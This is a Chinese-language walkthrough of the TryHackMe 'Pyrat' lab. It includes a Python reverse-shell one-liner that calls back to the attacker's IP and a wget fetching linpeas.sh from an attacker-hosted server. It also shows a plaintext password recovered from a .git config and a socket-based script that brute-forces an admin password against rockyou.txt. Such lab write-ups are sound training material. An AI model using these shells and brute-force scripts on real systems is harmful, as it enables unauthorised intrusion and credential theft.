TryHackMe-Pyrat

1
nmap -sC -sV -oN 1.txt 10.10.182.195

扫到8000端口,访问发现提示

Try a more basic connection

啥?更基础的连接,怎么链接,nc

尝试nc

执行反弹shell命令

1
import socket,os,pty;s=socket.socket();s.connect(("10.23.102.205",1234));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);pty.spawn("/bin/sh")

过来的是sh,换成交互式shell

1
python3 -c 'import pty; pty.spawn("/bin/bash")'

翻了一遍,发现home文件下有个think,但是没权限读,用linpeas.sh

1
2
3
cd /tmp
wget http://10.23.102.205:8080/linpeas.sh
chmod +x linpeas.sh

image-20250424192027907

进入到opt/dev/.git

查看配置文件发现ssh链接密码

image-20250424192250990

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
[core]
        repositoryformatversion = 0
        filemode = true
        bare = false
        logallrefupdates = true
[user]
        name = Jose Mario
        email = josemlwdf@github.com

[credential]
        helper = cache --timeout=3600

[credential "https://github.com"]
        username = think
        password = _TH1NKINGPirate$_

尝试切换用户,发现失败

image-20250424192450189

ssh连接试试

1
ssh think@10.10.222.124

image-20250424192754619

996bdb1f619a68361417cabca5454705

1
git show

发现历史脚本,感觉这就是环境的运行脚本

image-20250424193026880

会对某些单词进行设置,nc后如果对了应该就能获得root权限

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
import socket

# Configuration
target_ip = "10.10.222.124"  # Target IP
target_port = 8000          # Target port
password_wordlist = "/usr/share/wordlists/rockyou.txt"  # Path to the password wordlist file

def connect_and_send_password(password):
    try:
        client_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        client_socket.connect((target_ip, target_port))
        client_socket.sendall(b'admin\n')

        response = client_socket.recv(1024).decode()
        print(f"Server response after sending 'admin': {response}")

        if "Password:" in response:
            print(f"Trying password: {password}")
            client_socket.sendall(password.encode() + b"\n")

            response = client_socket.recv(1024).decode()

            if "success" in response.lower() or "admin" in response.lower():
                print(f"Server response for password '{password}': {response}")
                return True
            else:
                print(f"Password '{password}' is incorrect or no response.")

        return False

    except Exception as e:
        print(f"Error: {e}")
        return False

    finally:
        client_socket.close()

def fuzz_passwords():
    with open(password_wordlist, "r", encoding="latin-1") as file:  # Updated to use encoding="latin-1"
        passwords = file.readlines()

    for password in passwords:
        password = password.strip()  # Remove any newline characters

        if connect_and_send_password(password):
            print(f"Correct password found: {password}")
            break
        else:
            print(f"Password {password} was incorrect. Reconnecting...")

if __name__ == "__main__":
    fuzz_passwords()

得到密码是abc123

image-20250424193343296